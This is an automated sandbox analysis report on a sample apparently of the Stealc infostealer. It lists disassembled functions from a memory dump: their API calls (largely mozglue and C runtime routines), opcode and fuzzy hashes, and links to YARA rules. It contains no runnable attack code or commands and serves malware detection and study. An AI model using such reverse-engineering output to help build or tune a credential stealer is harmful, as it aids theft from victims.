Instruction Fuzzy Hash: 8D517F75E041298FCF18DF68C854BAEBBF2FB89308F198A19C825A7750D7306946CB90

Function 6C127170 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 6C127250
EnterCriticalSection.KERNEL32(6C14F688), ref: 6C127277
__aulldiv.LIBCMT ref: 6C1272C4
LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C1272F7

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
String ID:
API String ID: 557828605-0
Opcode ID: 662b8b2a807ba9577d1191835c1fec0c264f970356b5637cd3ee85e46f1621a6
Instruction ID: e25e2008936a7e972b0461bb9bde9359229618ab3a5003f7a776e3607eacdeef
Opcode Fuzzy Hash: 662b8b2a807ba9577d1191835c1fec0c264f970356b5637cd3ee85e46f1621a6
Instruction Fuzzy Hash: 51515F75E001298FCF08DFA9C851ABFBBB1FB89308F15861AD825A7750D7356986CBD0

Function 6C0CCDF0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0CCEBD
memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C0CCEF5
memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C0CCF4E

Strings

0, xrefs: 6C0CCF30

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpy$memset
String ID: 0
API String ID: 438689982-4108050209
Opcode ID: b1e65be15f80ac1e1631e108a9b3ccf9b866ba9a115a55aa42b9d75800ac81db
Instruction ID: 917d8cb3fbe9a93e5a22a6878c31e94cd779173e519025a06c835b848b7bb7ef
Opcode Fuzzy Hash: b1e65be15f80ac1e1631e108a9b3ccf9b866ba9a115a55aa42b9d75800ac81db
Instruction Fuzzy Hash: A351F275A0026A8FCB00CF18C490B9AFBE5EF99304F198699D8595F352D731ED06CBE0

Function 6C1277D0 Relevance: 6.1, APIs: 4, Instructions: 113stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1277FA
?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C127829

Part of subcall function 6C0FCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C0C31A7), ref: 6C0FCC45
Part of subcall function 6C0FCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C0C31A7), ref: 6C0FCC4E

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C12789F
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C1278CF

Part of subcall function 6C0C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C0C4E5A
Part of subcall function 6C0C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C0C4E97

Part of subcall function 6C0C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C103EBD,6C103EBD,00000000), ref: 6C0C42A9

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: 6e1a678e17cf9a024f3d66449b6336c32d48a686f5a3cd1e8c4acf0a98d01b3b
Instruction ID: cbc2f340638b7994f42acb9fed830cbb1529365645c95065310828ea658692e9
Opcode Fuzzy Hash: 6e1a678e17cf9a024f3d66449b6336c32d48a686f5a3cd1e8c4acf0a98d01b3b
Instruction Fuzzy Hash: 3E41AE75A047469BD300DF29D48056BFBF4FF8A258F204A2EE4A987640DB70E599CBD2

Function 6C106470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C1082BC,?,?), ref: 6C10649B

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1064A9

Part of subcall function 6C0FFA80: GetCurrentThreadId.KERNEL32 ref: 6C0FFA8D
Part of subcall function 6C0FFA80: AcquireSRWLockExclusive.KERNEL32(6C14F448), ref: 6C0FFA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C10653F
free.MOZGLUE(?), ref: 6C10655A

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 79e7b85c3da8cdb2c6c546bd9491edbc3ed30ccc87e3590b0bc00bebb34a03be
Instruction ID: c86d12365eae396f66b3bdfa9f2edcf17deabe05c384e41a40bd627dbaff8e92
Opcode Fuzzy Hash: 79e7b85c3da8cdb2c6c546bd9491edbc3ed30ccc87e3590b0bc00bebb34a03be
Instruction Fuzzy Hash: 2E318FB5A043159FC700CF24D884B9ABBE4BF89358F40842EEC5A97740EB34F919CB92

Function 6C11A2B0 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C11A315
?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6C11A31F
free.MOZGLUE(00000000,?,?,?,?), ref: 6C11A36A

Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2

Part of subcall function 6C112140: free.MOZGLUE(?,00000060,?,6C117D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C11215D

free.MOZGLUE(00000000), ref: 6C11A37C

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
String ID:
API String ID: 700533648-0
Opcode ID: 7c38da5b8db8bd869b82c92be33b57f9193dbc58d9d4f0ff4baf7732d64bf118
Instruction ID: 23b89269b9f2182c370381fe8630638058cc4ef4bae83ca39c85d63e26d41477
Opcode Fuzzy Hash: 7c38da5b8db8bd869b82c92be33b57f9193dbc58d9d4f0ff4baf7732d64bf118
Instruction Fuzzy Hash: 7B21F975A042249BCB01DF05D440B9FBBB9EF8A768F458065DD095BB00D739FD0AC6D1

Function 6C0FFF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C11D019,?,?,?,?,?,00000000,?,6C10DA31,00100000,?), ref: 6C0FFFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6C11D019,?,?,?,?,?,00000000,?,6C10DA31,00100000,?,?), ref: 6C0FFFF5
free.MOZGLUE(?,?,?,?,?,6C11D019,?,?,?,?,?,00000000,?,6C10DA31,00100000,?), ref: 6C10001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C11D019,?,?,?,?,?,00000000,?,6C10DA31,00100000,?,?), ref: 6C10002A

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: 57d7922d473a719d65bee1a397e18723549dbda6c1eefdaaf22af544b9647567
Instruction ID: de58a6cd686696b32486d822d44ef85454425ab7228eb8a0ec73284a980cafa7
Opcode Fuzzy Hash: 57d7922d473a719d65bee1a397e18723549dbda6c1eefdaaf22af544b9647567
Instruction Fuzzy Hash: 14210872B002215FD7089E789C944AFB7FAEB853247254738E825D7780EA70AD4686D1

Function 6C127930 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C0DBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C127A3F), ref: 6C0DBF11
Part of subcall function 6C0DBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C127A3F), ref: 6C0DBF5D
Part of subcall function 6C0DBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C127A3F), ref: 6C0DBF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C127968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C12A264,6C12A264), ref: 6C12799A

Part of subcall function 6C0D9830: free.MOZGLUE(?,?,?,6C127ABE), ref: 6C0D985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C1279E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C1279E8

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: c7747a20ce595dd6612dae9fc5e77ce3a4b6fcd4f73759d944328cff67897918
Instruction ID: 40f0f836cd65a844e5833ae908aa37158400ec5e41e7df26d11b3a7d7b10e7ec
Opcode Fuzzy Hash: c7747a20ce595dd6612dae9fc5e77ce3a4b6fcd4f73759d944328cff67897918
Instruction Fuzzy Hash: 67218C357043149FCB14EF18D894A9EBBF5EF89318F00886CE84A87351CB30E909DB92

Function 6C127A10 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C0DBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C127A3F), ref: 6C0DBF11
Part of subcall function 6C0DBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C127A3F), ref: 6C0DBF5D
Part of subcall function 6C0DBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C127A3F), ref: 6C0DBF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6C127A48
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6C127A7A

Part of subcall function 6C0D9830: free.MOZGLUE(?,?,?,6C127ABE), ref: 6C0D985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C127AC0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C127AC8

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: 7cb933afe4d534c5128e1c4a59eef85dbeb8c95bda97924936d550b8d30504be
Instruction ID: 1b6774712c94322b2905daaea631f59135a4e37c26422e8318435e6baf134b69
Opcode Fuzzy Hash: 7cb933afe4d534c5128e1c4a59eef85dbeb8c95bda97924936d550b8d30504be
Instruction Fuzzy Hash: 37214A757043149BCB14EF18D895A9EBBE5EF89318F01886CE84A87351CB30E909DB92

Function 6C0DB4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0DB4F5
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C0DB502
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C0DB542
free.MOZGLUE(?), ref: 6C0DB578

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 6e47ac9ea1993fc0d9a6376a1742f4048630b08f441b714cabe899dc35fb4ca6
Instruction ID: 453c2edadd1a8b7c435740d389c185bc38555be12fe205329b7b987c98739b43
Opcode Fuzzy Hash: 6e47ac9ea1993fc0d9a6376a1742f4048630b08f441b714cabe899dc35fb4ca6
Instruction Fuzzy Hash: FD11CA35A14B45CBD7129F29C804BA6B3F1FF9A328F55971AE84963B01EBB0B1C58790

Function 6C103DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C0CF20E,?), ref: 6C103DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C0CF20E,00000000,?), ref: 6C103DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C103E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C103E0E

Part of subcall function 6C0FCC00: GetCurrentProcess.KERNEL32(?,?,6C0C31A7), ref: 6C0FCC0D
Part of subcall function 6C0FCC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C0C31A7), ref: 6C0FCC16

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: 88db6dac826d1b92370131c8d30f465b2e1a815925beaa676ade8c49a778a738
Instruction ID: 44b73d710a1abb8bdf344be42087b309865b80ea2d74ce417160a9ec9739fc99
Opcode Fuzzy Hash: 88db6dac826d1b92370131c8d30f465b2e1a815925beaa676ade8c49a778a738
Instruction Fuzzy Hash: 7FF082B16002087BD700AB54DC41EAB376CEB46628F044020FE0C57741D635BD2996F7

Function 6C112050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C11205B
AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C11201B,?,?,?,?,?,?,?,6C111F8F,?,?), ref: 6C112064
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C11208E
free.MOZGLUE(?,?,?,00000000,?,6C11201B,?,?,?,?,?,?,?,6C111F8F,?,?), ref: 6C1120A3

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: aa9f139c54446a9a6ffb0521933a024fc94c217f42831146f1c983c5511913c4
Instruction ID: 47e662e4195a0b2b053d6a4d8ac286a7a065659a44353760449678244c7f1df6
Opcode Fuzzy Hash: aa9f139c54446a9a6ffb0521933a024fc94c217f42831146f1c983c5511913c4
Instruction Fuzzy Hash: B2F0B475204A009FC7119F16D888B5BB7F8EFCB328F10012AE50687B10D779E805CB95

Function 6C1120B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C1120B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6C0FFBD1), ref: 6C1120C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C0FFBD1), ref: 6C1120DA
free.MOZGLUE(00000000,?,6C0FFBD1), ref: 6C1120F1

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 4fbe3aca069d19da43f91abe17b93f18e2f63bacea0c68bb3d4cd8b7ec75ed1e
Instruction ID: b63f811fede688e4a936d270331473644d8f545b41f332eccb4e1aef56c939f8
Opcode Fuzzy Hash: 4fbe3aca069d19da43f91abe17b93f18e2f63bacea0c68bb3d4cd8b7ec75ed1e
Instruction Fuzzy Hash: A3E0E531604A248FC220AF259808A4EB7F9EFC7328B00063AE40683F00E77AF54686D5

Function 6C1185B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C1185D3

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C118725

Strings

map/set<T> too long, xrefs: 6C118720

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 9ee960a8a22c25f2000e98b815ab42d60d2442e18b4882335a2f0169e7c51a5f
Instruction ID: 06575d195ce9f1497997d1201eb2627c6a5694795f314a702686d58b00ba60a7
Opcode Fuzzy Hash: 9ee960a8a22c25f2000e98b815ab42d60d2442e18b4882335a2f0169e7c51a5f
Instruction Fuzzy Hash: 5E517974608651CFE701CF18C084B55BBF1BF5A318F1AC2AAD8595BB52C339E846CF91

Function 6C0CBD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C0CBDEB
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0CBE8F

Strings

0, xrefs: 6C0CBE5B

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0
API String ID: 2811501404-4108050209
Opcode ID: 01154f9a31fef2773f8c5e7ed77bd79a00fe490e212e93684f909e5f3d1e99f3
Instruction ID: 70a67fcca7d6b4b2f133cefd049ca2674abc4f64daa51a895801bec6a992e3d1
Opcode Fuzzy Hash: 01154f9a31fef2773f8c5e7ed77bd79a00fe490e212e93684f909e5f3d1e99f3
Instruction Fuzzy Hash: 2141AC71A09745CFC711DF38C481A9FBBE4AF8A348F008A1DF995A7611E731E9498B83

Function 6C0C9A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C0C9B2C
memcpy.VCRUNTIME140(6C0C99CF,00000000,?), ref: 6C0C9BB6
memcpy.VCRUNTIME140(?,?,?), ref: 6C0C9BF8
memcpy.VCRUNTIME140(?,?,?), ref: 6C0C9DE4

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: d79a3b8207535333c6f5a14b0f649be1b920c4aeca52568cd84d7ea0eee6f824
Instruction ID: e5a0f68e2a57e82d1cb87833b9f992cdcb50167ac2fdb6097c342cdf0e35da9b
Opcode Fuzzy Hash: d79a3b8207535333c6f5a14b0f649be1b920c4aeca52568cd84d7ea0eee6f824
Instruction Fuzzy Hash: D0D15A71B0021A9FCB14CF69C980BAEBBF2FF88318F184529E949A7740D771E955CB91

Function 6C110A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6C0D37F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6C12145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6C0D380A

Part of subcall function 6C108DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6C1206E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6C108DCC

